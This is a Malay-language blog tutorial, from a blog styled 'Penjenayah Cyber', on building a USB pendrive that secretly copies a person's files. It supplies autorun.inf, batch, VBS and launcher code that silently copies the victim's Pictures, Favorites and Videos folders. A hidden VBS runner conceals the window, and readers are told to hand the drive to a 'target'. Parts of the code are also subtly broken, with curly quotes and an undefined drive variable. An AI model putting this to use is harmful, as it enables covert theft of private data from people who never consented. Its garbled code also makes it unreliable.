Cara Dapatkan Maklumat Dari PC Seseorang Dengan Pendrive

Assalamualaikum dan salam sejahtera buat semua pembaca blog.Penjenayah Cyber. Mungkin dah agak lama saya tak update kat blog ini dan admin-admin lain sibuk dengan exam. Maklumlah, ada yang PMR, ada yang SPM. Jadi, mereka perlu agihkan masa dan kadang-kadang tak sempat nak update kat blog ini.

Sekarang, saya nak ajar anda semua bagaimana untuk dapatkan maklumat sulit dari PC seseorang dengan hanya menggunakan Pendrive. Ok, untuk pengetahuan pembaca semua, kita akan menggunakan virus Autorun.inf yang pernah saya ajarkan dulu bagaimana untuk padam virus tersebut dari Pendrive. Sebenarnya, tutorial ini diambil dari blog OMG! Hackers?. Jadi, sumber asalnya di SINI.

Jangan risau, sebab 75% daripada tutorial ini ditulis oleh saya. Jadi, mari kita mulakan!


Diatas ialah senarai file yang diperlukan untuk mendapatkan maklumat tersebut. Kita hanya memerlukan 4 fail dengan nama dan format yang berbeza.

1. Langkah pertama, buka Notepad terlebih dahulu dan salin kod dibawah lalu tampal ke dalam Notepad tersebut. Simpan kod tersebut sebagai (Save as) autorun.inf.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Baris kod untuk icon adalah terletak pada pilihan anda. Anda boleh gunakannya atau biar icon lalai (default) sahaja yang digunakan.

2. Langkah kedua, buka Notepad dan salin kod dibawah, lalu tampal ke dalam Notepad. Simpan kod itu sebagai (Save as) file.bat.
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls

Kod file.bat ini sangat diperlukan kerana untuk mendapatkan maklumat di dalam folder Pictures, Favourites dan Video. 

3. Langkah ketiga, bukan Notepad sekali lagi dan salin kod dibawah, lalu tampal ke dalam Notepad. Simpan kod tersebut sebagai (Save as) invisible.vbs.

CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False

Untuk kod ini, ia akan menjalakan kod file.bat itu tadi sebagai satu proses. Jadi, tampilan CMD akan 'disembunyikan sebalik tabir'. Maknanya, kita membuat kerja ini secara senyap-senyap lah. Haha!

4. Ok, ini langkah yang terakhir. Buka Notepad dan salin kod dibawah, lalu tampal ke dalam Notepad. Simpan kod tersebut sebagai (Save as) launch.bat.

wscript.exe \invisible.vbs file.bat

Ok. Fail launch.bat ini akan mencari fail invisible.vbs lalu menjalankan ia bersama dengan file.bat, dengan erti kata file.bat menjalankan kod dari fail invisible.vbs.

5. Anda salin semua file yang telah kita buat tadi itu dan tampal ia di dalam Pendrive anda. Sebelum anda tampal ia, anda harus membuat 1 folder dengan nama ' all ' dan sembunyikan (hide) kesemua file ini (klik kanan, tandakan pada ' Hidden '.

Ok, bila dah siap, anda semua boleh tawarkan kepada sasaran anda untuk menggunakan Pendrive anda. Apabila Pendrive anda telah masuk ke dalam port USB komputernya, maka biarkan sahaja file-file tadi menjalankan kerjanya.

Sekian sahaja posted pada hari ini, semoga bermanfaat untuk anda semua. Assalamualaikum.

2 comments on "Cara Dapatkan Maklumat Dari PC Seseorang Dengan Pendrive"

  1. Thanks untuk kredit..nice blog.. :)

    ReplyDelete
  2. Most Welcome. Saya pun suka dengan posted-posted di blog OMG! Hackers?. Buat masa sekarang, blog OMG! Hackers? memang menjadi sumber rujukan saya untuk cari idea tutorial.

    ReplyDelete